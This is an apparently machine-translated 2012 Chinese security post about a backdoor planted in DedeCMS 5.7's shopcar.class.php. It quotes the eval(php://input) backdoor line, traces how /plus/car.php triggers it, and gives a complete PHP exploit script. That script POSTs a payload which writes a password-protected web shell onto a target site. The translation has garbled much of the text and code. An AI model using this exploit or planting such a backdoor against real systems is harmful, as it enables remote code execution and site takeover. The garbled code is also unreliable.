dedecms 5.7 a word the back door using the exp-bug warning-the black bar safety net

2012-03-22T00:00:00
ID MYHACK58:62201233405
Type myhack58
Reporter 佚名
Modified 2012-03-22T00:00:00

Description

author: a dance of the forest

tx Twitter: http://t.qq.com/wulinlw

Night to see this

http://www.wooyun.org/bug.php?action=view&id=5 4 1 6

shopcar.class.php is implanted in the word

@eval(file_get_contents('php://input'));

Go to the official website under the set back, look at the following code,

classMemberShops{var $OrdersId;var $productsId;function construct(){ $this->OrdersId= $this->getCookie("OrdersId");if(empty($this->OrdersId)){ $this->OrdersId= $this->MakeOrders();}@eval(file_get_contents('php://input'));}functionMemberShops(){ $this->construct();}

shopcar.class.php file only one MemberShops class, the constructor inside it appeared the back door, when the class is instantiated when it will automatically execute the constructor, the program APE, you know.

the eval implementation and file_get_contents to get content needless to say, php://input this is the input stream, the receiving of the post content, but the post type is not multipart/form-data

In eclipse search for new MemberShops, find /plus/car.php inside instance of this class,

require_once (dirname(FILE)."/../ include/common.inc.php");define('PLUS_TPL', DEDEROOT.'/ templets/plus');require_once(DEDEINC.'/ dedetemplate.class.php');require_once DEDEINC.'/ shopcar.class.php';require_once DEDEINC.'/ memberlogin.class.php';$cart =newMemberShops();

Start when writing a simple form to test, found the php://input the contents of special symbols will be urlencode, very strange it is, obviously, to take the post, but like the get the same be encoded, since it is so, then construct their own post, grab the package, use the fsockopen() function to simulate a post to submit it, the exp is as follows:

<? php//author: a dance of the forest//date : 2012-03-21 0 0:3 1:0 5//shell word address,/plus/dst.php password cmd//www. t. com/dede/plus/car. phperror_reporting(E_ERROR);set_time_limit(0);$url ='www.t.com';//the target Station url$dir ='/dede';//dedecms installation directory//$content = '$a=${@phpinfo()};';$content ='$a=${@file_put_contents("dst.php","<? php eval(\$_POST[cmd]); ?& gt;")};';$data = "POST $dir/plus/car.php HTTP/1.1\r\n";$data .= "Host: localhost\r\n";$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/2 0 1 0 0 1 0 1 For Firefox/5.0.1\r\n";$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n";$data .= "Content-Length: ". strlen($content)."\ r\n\r\n";$data .= $content."\ r\n";$socket=fsockopen($url,'8 0');if ($socket) { fwrite($socket,$data); while (! feof($socket)) { $exp.= fgets($socket, 1 0 2 4); } echo $exp;}else{ echo 'socket err';}?& gt;